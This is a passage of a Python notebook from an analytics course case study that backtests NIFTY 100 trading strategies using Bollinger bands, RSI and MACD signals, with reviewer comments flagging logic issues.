df_nifty = daily_nifty_back_test
daily_nifty_back_test['TradingStrategyRSI_revised'] = np.where(daily_nifty_back_test['rsi'] > 25, "positive", "negative")
Back_Test_10yrs = []
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 1000000 # investment of 10 lakhs across 100 stocks
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_nifty.iterrows():
    if i <= df_nifty.index[-1] :
        if next_step == 0:
            if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Sell":
                if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "negative":
                    Back_Test_10yrs.append(row['Date'])
                    Back_Test_10yrs.append("Sell")
                    Back_Test_10yrs.append(row['Close'])
                    Back_Test_10yrs.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
        else: # first time I have to buy
            if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs.append(row['Date'])
                        Back_Test_10yrs.append("Buy")
                        Back_Test_10yrs.append(row['Close'])
                        Back_Test_10yrs.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# Chunk the flat signal list into rows of 4 fields (Date, Txn, Price, Qty).
n = 4
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = Buy_Sell_dataframe.tail(1)['Txn']
if (last_txn == "Buy").bool():
    date = "2020-08-28"
    add_rows_list.append(date) # Date
    add_rows_list.append("Sell") # Sell
    price = daily_nifty_back_test['Close'].tail(1).values[0]
    add_rows_list.append(price) # Close price per the last date for that stock
    qty = Buy_Sell_dataframe.tail(1)['Qty'].values[0]
    add_rows_list.append(qty) # qty
    value = price * qty
    add_rows_list.append(value)
# synthesized closing row carries 5 fields, hence n = 5 here
n = 5
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
# Summarize the NIFTY 100 Bollinger + RSI>25 back-test and export the ledger.
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Nifty100", "Bollinger, RSI", "Middle Band; RSI>25", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(20)
Summary_Report_df.head(20)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Nifty100 Bollinger RSI 25 Buy_Sell list.csv')
# +
# BACK-TESTING FOR 10 YEARS - for NIFTY
# RSI>25 and MACD (4,15 - macd9 - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# NOTE(review): this rebinds daily_nifty_back_test to the FULL daily_nifty100
# (including Sep-Nov 2020 rows), discarding the <= 2020-08-28 mask applied
# earlier, and the column writes below mutate daily_nifty100 through the
# alias.  The final forced sell still labels itself 2020-08-28 while using
# the last row's close -- confirm whether the mask should be re-applied.
daily_nifty_back_test = daily_nifty100
# calculate MACD
# MACD = 4-day EMA - 15-day EMA
daily_nifty_back_test['ema4'] = daily_nifty_back_test['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_nifty_back_test['ema15'] = daily_nifty_back_test['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_nifty_back_test['macd_revised'] = daily_nifty_back_test['ema4'] - daily_nifty_back_test['ema15']
## for cross over - calculate macd9
# NOTE(review): the signal line is recomputed from the original 'macd'
# (12/26) column, not from 'macd_revised' -- confirm this mix is intended.
daily_nifty_back_test['macd9'] = daily_nifty_back_test['macd'].transform(lambda x:x.ewm(span=9).mean())
# determine Bearish or Bullish market and the trade strategy based on macd and macd9
# if macd > macd9, "bullish" and "buy"
# if macd < macd9, "bearish" and "sell"
daily_nifty_back_test['TradingStrategymacd_revised'] = np.where(daily_nifty_back_test['macd_revised'] > daily_nifty_back_test['macd9'], "Buy", "Sell")
daily_nifty_back_test['TradingStrategyRSI_revised'] = np.where(daily_nifty_back_test['rsi'] > 25, "positive", "negative")
df_nifty = daily_nifty_back_test
Back_Test_10yrs = []
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 1000000 # investment of 10 lakhs across 100 stocks
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_nifty.iterrows():
    if i <= df_nifty.index[-1] :
        if next_step == 0:
            if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "negative":
                if df_nifty.loc[row_index, 'TradingStrategymacd_revised'] == "Sell":
                    Back_Test_10yrs.append(row['Date'])
                    Back_Test_10yrs.append("Sell")
                    Back_Test_10yrs.append(row['Close'])
                    Back_Test_10yrs.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
        else: # first time I have to buy
            if df_nifty.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
                if df_nifty.loc[row_index, 'TradingStrategymacd_revised'] == "Buy":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs.append(row['Date'])
                        Back_Test_10yrs.append("Buy")
                        Back_Test_10yrs.append(row['Close'])
                        Back_Test_10yrs.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# Chunk the flat signal list into rows of 4 fields (Date, Txn, Price, Qty).
n = 4
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = Buy_Sell_dataframe.tail(1)['Txn']
if (last_txn == "Buy").bool():
    date = "2020-08-28"
    add_rows_list.append(date) # Date
    add_rows_list.append("Sell") # Sell
    price = daily_nifty_back_test['Close'].tail(1).values[0]
    add_rows_list.append(price) # Close price per the last date for that stock
    qty = Buy_Sell_dataframe.tail(1)['Qty'].values[0]
    add_rows_list.append(qty) # qty
    value = price * qty
    add_rows_list.append(value)
# synthesized closing row carries 5 fields, hence n = 5 here
n = 5
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
# # CONSOLIDATING THE RETURNS INCLUDING NIFTY
# Summarize the NIFTY 100 RSI>25 + MACD(4,15)-9 back-test, export the ledger,
# then dedupe and rank all accumulated strategy reports.
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Nifty100", "RSI, MACD", "RSI>25, MACD (4,15) - 9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\NIFTY100 RSI MACD 415 Buy_Sell list.csv')
# Re-running notebook cells appends duplicate report rows; keep the first of each.
Consolidated_Report_df_final = Consolidated_Report_df.drop_duplicates(subset=['Stock/Index', 'KPI', 'Criteria', 'Transaction'], keep='first', inplace=False)
Summary_Report_df_final = Summary_Report_df.drop_duplicates(subset=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss'], keep='first', inplace=False)
Consolidated_Report_df_final.sort_values(['Value', 'Stock/Index', 'KPI'], ascending = False)
Summary_Report_df_final.sort_values(['Net Profit/Loss', 'Number of Txns'], ascending = False)
# # PORTFOLIO SELECTION
# +
## NOW that back-testing proves the following KPIs in order to over-achieve NIFTY100 returns
## 1. Bollinger, RSI > 25
## 2. OBV
## 3. RSI>25, MACD with [(EMA4- EMA15) -EMA9]
## Lets try for options 1 and 3 if we had just done top 10 stocks instead of all 100 stocks
# +
# Prepare the stock selection based on MACD and CLOSE PRICE.
# MACD = 4-day EMA - 15-day EMA, computed PER SYMBOL so the EWM state does not
# bleed across stock boundaries (daily_data_back_test holds all 100 stocks
# stacked; the weekly_portfolio1_stock_selection helper below uses the same
# grouped form).
daily_data_back_test['ema4'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
## for cross over - calculate macd9
# BUG FIX: this previously read daily_nifty_back_test['macd_revised'] (the
# index frame), index-aligning a different, shorter series into the stock
# frame; derive the signal line from this frame's own macd_revised instead.
daily_data_back_test['macd9'] = daily_data_back_test.groupby('Symbol')['macd_revised'].transform(lambda x:x.ewm(span=9).mean())
# Normalise MACD by price so cheap and expensive stocks rank comparably.
daily_data_back_test['macd4/close'] = daily_data_back_test['macd_revised'] / daily_data_back_test['Close']
# -
## PORTFOLIO 1 SELECTION BASED ON MACD (4, 15) DIVIDED BY CLOSE PRICE.
# THIS WOULD HELP US TO ENSURE THAT WE CAN GET DIFFERENT PRICE RATHER THAN HIGHER END STOCKS
daily_data_back_test_rank = daily_data_back_test
daily_data_back_test_rank['rank - macd4/close'] = abs(daily_data_back_test_rank['macd4/close']).rank()
Stock_data_ranked = daily_data_back_test_rank.sort_values("rank - macd4/close", ascending= True)
Stock_data_ranked.reset_index().head(10)
# NOTE(review): head(10) takes the first 10 ROWS, so the same symbol can
# repeat and the portfolio may hold fewer than 10 distinct stocks -- confirm.
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
daily_data_stock_selected = daily_data_back_test.loc[daily_data_back_test['Symbol'].isin(portfolio_stocks)]
portfolio_stocks
# +
# 1. Lets try with Bollinger and RSI > 25 but with data limited to top 10 stocks
daily_data_stock_selected['TradingStrategyRSI_revised'] = np.where(daily_data_stock_selected['rsi'] > 25, "positive", "negative")
# REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLING AND RSI (with RSI > 30 for Buy call)
# Per-symbol ENTER/SELL/WAIT labelling; first row of each symbol is WAIT.
# NOTE(review): `i <= df_group.index[-1]` compares the within-group counter
# against the ORIGINAL frame's last index label, so it is effectively always
# true for every group -- confirm the intended guard.
df1_grouped = daily_data_stock_selected.groupby('Symbol')
COMBINED = [0]
for group_keys, df_group in df1_grouped:
    i = 0
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if i == 0 :
                COMBINED.append("WAIT")
            else:
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                    if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
                        COMBINED.append("ENTER")
                    else:
                        COMBINED.append("SELL")
                else:
                    COMBINED.append("WAIT")
            i = i + 1
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_stock_selected['TradingStrategyCombined_bol_rsi_revised'] = dataframe_COMBINED_corrected['COMBINED'].values
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Per-symbol alternating Buy/Sell state machine driven by the combined
# Bollinger+RSI label; each symbol starts fresh with its own 1-lakh budget.
df1_grouped = daily_data_stock_selected.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # for each group_key or Symbol
    j = 0 # for each row in the symbol
    number_stock = 0
    money = 100000 # investment of 10 lakhs for 10 stocks
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "SELL":
                    Back_Test_10yrs_r.append(row['Date'])
                    Back_Test_10yrs_r.append(row['Symbol'])
                    Back_Test_10yrs_r.append("Sell")
                    Back_Test_10yrs_r.append(row['Close'])
                    Back_Test_10yrs_r.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "ENTER":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Buy")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
            i = i + 1
# Chunk the flat signal list into rows of 5 fields (Date, Symbol, Txn, Price, Qty).
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
# NOTE(review): the symbol-change branch looks the price up in
# daily_data_back_test while the last-row branch uses
# daily_data_stock_selected -- both should resolve to the same close, but
# confirm the inconsistency is harmless.
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    if ((i == row_count) and (row['Txn'] == "Buy")):
        date = "2020-08-28"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = daily_data_stock_selected[(daily_data_stock_selected['Symbol'] == row['Symbol']) & (daily_data_stock_selected['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# synthesized closing rows carry 6 fields, hence n = 6 here
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the column headers
# NOTE(review): this is a Series, so assigning .columns is a no-op (see the
# identical pattern earlier in the file) -- confirm intent.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Summarize in a dataframe: per-symbol Sell-minus-Buy diff, scaled by 100.
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
# Summarize the portfolio-restricted Bollinger + RSI>25 back-test and export.
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Portfolio 3: Bollinger, RSI", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 53 out of 100 (no where close to 66% thats expected)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Portfolio 3 Bollinger RSI 25 Buy_Sell list.csv')
# # PORTFOLIO RETURNS FOR THE 3 TOP PERFORMING KPIs
# store the back-test outputs as CSVs.
# Raw-string literals for the Windows paths (consistent with every other
# export in this file): the previous non-raw literals only worked because
# '\P', '\B', etc. happen not to be escape sequences, and they emit
# DeprecationWarnings ("invalid escape sequence") on modern Python.
# The resulting path strings are byte-identical.
Buy_Sell_Summary_r.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Back_Test Stock Summary Aug-20.csv')
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Back_Test Stock Txn details Aug-20.csv')
Consolidated_Report_df.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Back_test Consolidated report Aug-20.csv')
Summary_Report_df.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Back_test Summary report Aug-20.csv')
## PORTFOLIO 2: SELECTION BASED ON % CHANGE IN CLOSE PRICE
# determine which stocks to buy. first look at price change each day for each stock
# Portfolio 2: rank stocks by per-symbol daily log return and keep the
# symbols from the 10 lowest-return rows.
daily_data_back_test['dailypricechange'] = np.log(daily_data_back_test.groupby('Symbol')['Close'].pct_change().add(1))
daily_data_back_test_rank = daily_data_back_test
daily_data_back_test_rank['rank - dailypricechange'] = daily_data_back_test_rank['dailypricechange'].rank()
Stock_data_ranked = daily_data_back_test_rank.sort_values("dailypricechange", ascending= True)
Stock_data_ranked.reset_index().head(10)
# NOTE(review): head(10) takes rows, not distinct symbols -- duplicates possible.
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
daily_data_stock_selected = daily_data_back_test.loc[daily_data_back_test['Symbol'].isin(portfolio_stocks)]
portfolio_stocks
## PORTFOLIO 3: SELECTION BASED ON % CHANGE IN volume each day by stock - take those that are having high volume change
# Same row-level head(10) mechanics as portfolio 2, but ranked on the daily
# log volume change instead of the price change.
daily_data_back_test['dailyvolumechange'] = np.log(daily_data_back_test.groupby('Symbol')['Volume'].pct_change().add(1))
daily_data_back_test_rank = daily_data_back_test
daily_data_back_test_rank['rank - dailyvolumechange'] = daily_data_back_test_rank['dailyvolumechange'].rank()
Stock_data_ranked = daily_data_back_test_rank.sort_values("dailyvolumechange", ascending= True)
Stock_data_ranked.reset_index().head(10)
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
daily_data_stock_selected = daily_data_back_test.loc[daily_data_back_test['Symbol'].isin(portfolio_stocks)]
portfolio_stocks
# # TEST FOR SEP DATA - STOCK
# +
## TEST FOR SEP'20 - EACH WEEK BASED ON PORTFOLIO 2 - WITH 2 OPTIONS:
# A) RSI/BOLLINGER
# B) RSI/MACD - 4,15
# COMPARE AGAINST NIFTY MOVEMENT FOR SEP'2020
# -
## data selection for each week
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
# NOTE(review): the mask hard-codes week 1's boundaries instead of indexing
# the lists above -- presumably the per-week iteration happens in later cells.
mask = ((daily_data['Date'] >= '2020-08-31') & (daily_data['Date'] <= '2020-09-04'))
daily_data_sep_2020 = daily_data.loc[mask]
week_end = week_end_dates[0]
def weekly_portfolio_stock_selection(weekly_data):
    """Pick the weekly portfolio by daily close-price log return (Portfolio 2).

    Mutates *weekly_data* in place, adding 'dailypricechange' (log of
    1 + per-symbol Close pct change) and 'rank - dailypricechange'.
    Sorts ascending by the log return and keeps every row whose Symbol
    appears among the first 10 sorted rows; returns that filtered frame.
    """
    per_symbol_close = weekly_data.groupby('Symbol')['Close']
    weekly_data['dailypricechange'] = np.log(per_symbol_close.pct_change().add(1))
    weekly_data['rank - dailypricechange'] = weekly_data['dailypricechange'].rank()
    ranked = weekly_data.sort_values("dailypricechange", ascending=True)
    # Symbols occupying the 10 lowest log-return rows (duplicates possible).
    chosen_symbols = ranked['Symbol'].head(10).tolist()
    return weekly_data.loc[weekly_data['Symbol'].isin(chosen_symbols)]
def weekly_portfolio1_stock_selection (weekly_data):
    """Portfolio 1 selection: rank stocks by a fast MACD(4,15) scaled by Close.

    Dividing by Close keeps the ranking comparable across cheap and
    expensive stocks.  Adds the intermediate columns ('ema4', 'ema15',
    'macd_revised', 'macd9', 'macd4/close', 'rank - macd4/close') to
    *weekly_data* in place and returns the rows of the symbols found in
    the 10 lowest 'macd4/close' rows.

    Requires a pre-existing 'macd' column on *weekly_data*.
    """
    grouped_close = weekly_data.groupby('Symbol')['Close']
    weekly_data['ema4'] = grouped_close.transform(lambda s: s.ewm(span=4).mean())
    weekly_data['ema15'] = grouped_close.transform(lambda s: s.ewm(span=15).mean())
    weekly_data['macd_revised'] = weekly_data['ema4'] - weekly_data['ema15']
    # Signal line of the pre-existing 'macd' column (for cross-over checks).
    weekly_data['macd9'] = weekly_data['macd'].transform(lambda s: s.ewm(span=9).mean())
    weekly_data['macd4/close'] = weekly_data['macd_revised'] / weekly_data['Close']
    weekly_data['rank - macd4/close'] = weekly_data['macd4/close'].rank()
    ranked = weekly_data.sort_values("macd4/close", ascending=True)
    chosen_symbols = list(ranked['Symbol'].head(10))
    return weekly_data.loc[weekly_data['Symbol'].isin(chosen_symbols)]
## PORTFOLIO 3: SELECTION BASED ON % CHANGE IN volume each day by stock - take those that are having high volume change
def weekly_portfolio3_stock_selection (weekly_data):
    """Portfolio 3 selection: pick stocks by daily log change of traded Volume.

    Adds 'dailyvolumechange' and 'rank - dailyvolumechange' columns to
    *weekly_data* in place, then returns the rows of the symbols found in
    the 10 lowest volume-change rows.
    """
    # Daily log volume change per symbol: log(1 + pct_change(Volume)).
    volume_ratio = weekly_data.groupby('Symbol')['Volume'].pct_change().add(1)
    weekly_data['dailyvolumechange'] = np.log(volume_ratio)
    weekly_data['rank - dailyvolumechange'] = weekly_data['dailyvolumechange'].rank()
    ordered = weekly_data.sort_values("dailyvolumechange", ascending=True)
    # Symbols of the 10 lowest-change rows (a symbol may repeat here).
    picked = list(ordered['Symbol'].head(10))
    return weekly_data.loc[weekly_data['Symbol'].isin(picked)]
# +
# 1. Lets try with Bollinger and RSI > 25 but with data limited to top 10 stocks
def weekly_stock_buy_and_sell (weekly_stock_selected, week_num, stock_in_portfolio, weekly_money):
    """Simulate one week of trades for the pre-selected stocks.

    Signals: "ENTER" when Bollinger says "Buy" and RSI > 25, "SELL" when
    Bollinger says "Buy" but RSI <= 25, "WAIT" otherwise.  The available
    money is split equally across the symbols producing a buy signal.

    Returns (transactions_dataframe, updated_portfolio, remaining_money).

    NOTE(review): appends to the module-level globals `stock_to_sell` and
    `remove_stock`, and relies on the module-level `divide_chunks` helper.
    """
    weekly_stock_selected['TradingStrategyRSI_revised'] = np.where(weekly_stock_selected['rsi'] > 25, "positive", "negative")
    # REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLING AND RSI (with RSI > 30 for Buy call)
    df1_grouped = weekly_stock_selected.groupby('Symbol')
    # Seed with a dummy 0 so the first real signal lands at index 1; the
    # dummy row is stripped again below.
    COMBINED = [0]
    weekly_stock_sell = []  # NOTE(review): never filled, so the portfolio sell check below is a no-op
    for group_keys, df_group in df1_grouped:
        i = 0
        for row_index, row in df_group.iterrows():
            if i <= df_group.index[-1] :
                if i == 0 :
                    # First row of each symbol has no prior data: wait.
                    COMBINED.append("WAIT")
                else:
                    if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                        if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
                            COMBINED.append("ENTER")
                        else:
                            COMBINED.append("SELL")
                    else:
                        COMBINED.append("WAIT")
            i = i + 1
    # convert the series to dataframe with column as COMBINED
    dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
    # remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
    dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
    dataframe_COMBINED_corrected.tail()
    # add the Combined Strategy value to the existing daily_data dataframe
    weekly_stock_selected['TradingStrategyCombined_bol_rsi_revised'] = dataframe_COMBINED_corrected['COMBINED'].values
    # Check if stocks to sell (Weekly signal) is in stocks_portfolio
    if len(stock_in_portfolio) > 0:
        for item in stock_in_portfolio:
            if item in weekly_stock_sell:
                stock_to_sell.append(item)
    # Number of distinct symbols with a buy signal this week; used to split
    # the available money equally.
    number_of_buytxn = 0
    temp_week_buy_txn = weekly_stock_selected[(weekly_stock_selected['TradingStrategyRSI_revised'] == "positive") & (weekly_stock_selected['TradingStrategyBollinger'] == "Buy")]
    number_of_buytxn = temp_week_buy_txn['Symbol'].nunique()
    # REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
    # BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
    sell_stock_portfolio = 0
    sell_stock_portfolio = weekly_stock_selected['Symbol'].isin(stock_in_portfolio).any().any()
    df1_grouped = weekly_stock_selected.groupby('Symbol')
    Back_Test_10yrs_r = []
    add_stock = []
    # NOTE(review): this overwrites the isin() result computed just above,
    # so selling is always enabled - confirm intended.
    sell_stock_portfolio = 1
    total_buy_value = 0
    total_sell_value = 0
    money_per_stock = 0
    if number_of_buytxn > 0 :
        for group_keys, df_group in df1_grouped:
            i = 0 # for each group_key or Symbol
            j = 0 # for each row in the symbol
            number_stock = 0
            next_step = 1 # 1 - Buy, 0 - Sell
            money_per_stock = weekly_money // number_of_buytxn #distributing equally to all 10 stocks - 10% of available money
            for row_index, row in df_group.iterrows():
                sell_value = 0
                buy_value = 0
                if i <= df_group.index[-1] :
                    if money_per_stock > 0:
                        if next_step == 0:
                            # Currently holding this stock: look for a SELL signal.
                            if sell_stock_portfolio:
                                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "SELL":
                                    Back_Test_10yrs_r.append(week_num)
                                    Back_Test_10yrs_r.append(row['Date'])
                                    Back_Test_10yrs_r.append(row['Symbol'])
                                    Back_Test_10yrs_r.append("Sell")
                                    Back_Test_10yrs_r.append(row['Close'])
                                    Back_Test_10yrs_r.append(number_stock)
                                    sell_value = number_stock * row['Close']
                                    total_sell_value = total_sell_value + sell_value
                                    money_per_stock = money_per_stock + row['Close'] * number_stock
                                    next_step = 1
                                    remove_stock.append(row['Symbol'])
                                    j = j + 1
                        else: # first time I have to buy
                            if money_per_stock > 0:
                                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "ENTER":
                                    number_stock = money_per_stock // row['Close'] # floor division to get the integer number of stocks
                                    if number_stock > 0:
                                        Back_Test_10yrs_r.append(week_num)
                                        Back_Test_10yrs_r.append(row['Date'])
                                        Back_Test_10yrs_r.append(row['Symbol'])
                                        Back_Test_10yrs_r.append("Buy")
                                        Back_Test_10yrs_r.append(row['Close'])
                                        Back_Test_10yrs_r.append(number_stock)
                                        money_per_stock = money_per_stock - row['Close'] * number_stock
                                        next_step = 0
                                        buy_value = number_stock * row['Close']
                                        total_buy_value = total_buy_value + buy_value
                                        add_stock.append(row['Symbol'])
                                        stock_to_sell.append(row['Symbol'])
                                        j = j + 1
                i = i + 1
    # Cash left after this week's buys and sells.
